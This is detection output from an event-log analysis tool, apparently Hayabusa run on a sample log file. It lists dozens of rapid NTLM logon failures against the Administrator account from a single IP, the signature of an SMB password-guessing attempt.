+2016-09-19 16:51:31.470 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXrtxquzyzxKnQgD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.526 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWOoEIEem7Q9Mdx0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.565 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86n5nIm04810NptD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M08noHtTqqx3pxSe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.651 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P983pRVfCVlVTyA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.699 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMKlcLvRhlx9FMcZ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0gwEDgRF2wUgTDAy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.780 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9Q2GSALfiuEbulo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DKTja76Qe9vSjrdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXuUyKlvaOgMNSu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X3qdEQReXwHAZUS8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:31.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqtfHJKOfmWXEd4s | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.021 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVv7vete3uXixggi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0PF6E3wRP0Tk39ss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.106 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: touwF4IXUahG7jvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lMOi7rygc7SJ5TPQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QjM1K5eFSA9U37oE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.258 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
HgzyZqFU9v2kDVvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.301 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hJeVj2h0sBxwBuGv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.355 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FNXI8b6Zcj1zU3JY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.408 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9DyH9oxFbRTCQ80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.458 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.556 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.685 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.725 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.806 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.886 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.932 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:32.985 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.089 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.136 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.186 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.275 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.305 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.348 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.397 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.484 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.537 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.572 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:33.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.721 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.758 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.802 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.890 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:33.978 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.025 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.065 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.115 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.155 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.244 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.335 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.438 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.493 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.667 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.721 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.826 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:34.925 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.098 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.150 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:35.258 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
